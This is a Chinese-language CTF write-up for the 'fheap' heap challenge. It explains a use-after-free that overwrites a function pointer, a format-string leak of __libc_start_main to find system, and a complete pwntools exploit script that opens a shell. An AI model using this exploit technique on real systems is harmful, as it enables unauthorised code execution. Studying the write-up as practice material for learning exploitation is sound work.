文章目录
- fheap libc 2.23 64位
- 检查
- main
- create
- delete
- 思路
- 覆盖目标函数的指针
- printf内部
- 调用覆盖的函数前
- 调用 printf时的栈
- 实际去的函数的地方
- 查找当前版本对应的libc_start_main和system
- 计算出system的libc基地址
- exp
fheap libc 2.23 64位
检查
main
多层while,其实和选择也差不多
create
分配0x20的堆,指针赋值给ptr
首先输入size大小
然后输入到buf当中
再看实际的buf的有多少,如果大于15就用malloc分配实际长度的堆,其指针为dest,然后将buf的内容复制进去,同时更新ptr里的内容,前八个字节为dest的值然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free两次,先free存储内容的指针,再free原ptr指针
如果小于15,就直接将buf的内容赋值到ptr的开始部分,然后初始地址过24个字节开始被赋值函数的地址,此时对应的函数free一次
最后将遍历unk_2020c0数组 ,每个数组元素16个字节,前八个字节赋值为1,后八个字节赋值为ptr
delete
先根据索引检查unk_2020c0后24个字节是否为值,有值则存在这个string,然后输入yes后调用ptr中的free函数,参数为ptr,最后将此时索引的unk_2020c0前八个字节设置为0
思路
依然存在use after free漏洞,可以使得create时能得到可以修改原来存储string相关信息的堆中的存储函数指针的内容
首先create两次,此时只有两个堆,都是0x20,且都存储string的相关信息(delete时的调用的函数指针),然后申请一个大小0x20的string,此时可利用格式化字符串泄露某个函数的地址,然后得到libc基地址,然后再得到system的地址
然后delete该申请的string 再次create此时可以重写之前一开始id为1的堆块内容中的函数指针,此时为system的函数地址,并且刚该开始的堆内容为/bin/sh,此时再次delete(1)即可成功getshell
覆盖目标函数的指针
选用printf函数指针
函数装入内存时,由于地址随机化不会影响到低12位的值,此时可能可以成功覆盖到目的函数
printf内部
test指令(按位与)检查如果不是零就会执行movaps
movaps指令处理的内存位置必须是十六字节对齐的
如果不是零,就没有跳转,那么会执行movaps,满足十六字节对齐比较麻烦
所以我们先通过执行前面的存在的赋值ax为零的指令即可
调用覆盖的函数前
EAX与AX不是独立的,EAX是32位的寄存器,而AX是EAX的低16位。
举例来说
mov eax, 12345678h
那么AX将会是eax的低16位,也就是5678h。
而如果此时
mov ax,3344h
那么eax的值将变为12343344h,所以对ax的赋值是会影响eax的。
同样,AH是ax的高8位,而AL是ax的低8位,这就是说ah为33h,al为44h。
跳转后先执行mov eax,0
调用 printf时的栈
栈的第172个是libc_start_main+240
实际去的函数的地方
所以此时还需输入,此时想直接跳过这个地方输入只要输入一次-1就好了
查找当前版本对应的libc_start_main和system
计算出system的libc基地址
exp
from pwn import *
context(os="linux",arch="amd64",log_level="debug")
s=process("./pwn-f")
libc=ELF("./libc-2.23.so")
f=ELF("./pwn-f")
# gdb.attach(s,"b main")
def create(size,string):
s.sendlineafter(b"3.quit\n",b"create ")
s.sendlineafter(b"Pls give string size:",str(size))
s.sendafter(b"str:",string)# 注意此时不能用sendlineafter,内容中会在后面有一个换行府,在覆盖函数底地址会多覆盖一个字节
def delete(id):
s.sendlineafter(b"3.quit\n",b"delete ")
s.sendlineafter(b"id:",str(id))
s.sendlineafter(b"Are you sure?:",b"yes")
create(8, "ab")
create(8, "ab")
delete(1)
delete(0)
create(0x20, b'_libc_s_m+240:%176$pend'.ljust(0x18, b'c') + p8(0xB6)) # 0
delete(1)
s.recvuntil(b"_libc_s_m+240:")
libc_start_main_240= s.recvuntil("end", drop=True) # False是包括end
print(type(libc_start_main_240))
libc_start_main_240=int(libc_start_main_240,16) # 0x 形式的字节的转化为16进制数
system_addr = libc_start_main_240-240-0x20750+0x453a0
print("__libc_start_main_240: " + hex(libc_start_main_240))
print("system address: " + hex(system_addr))
s.sendline("-1")
delete(0)
create(0x20, b"/bin/sh;".ljust(24, b"p") + p64(system_addr))
delete(1)
s.interactive()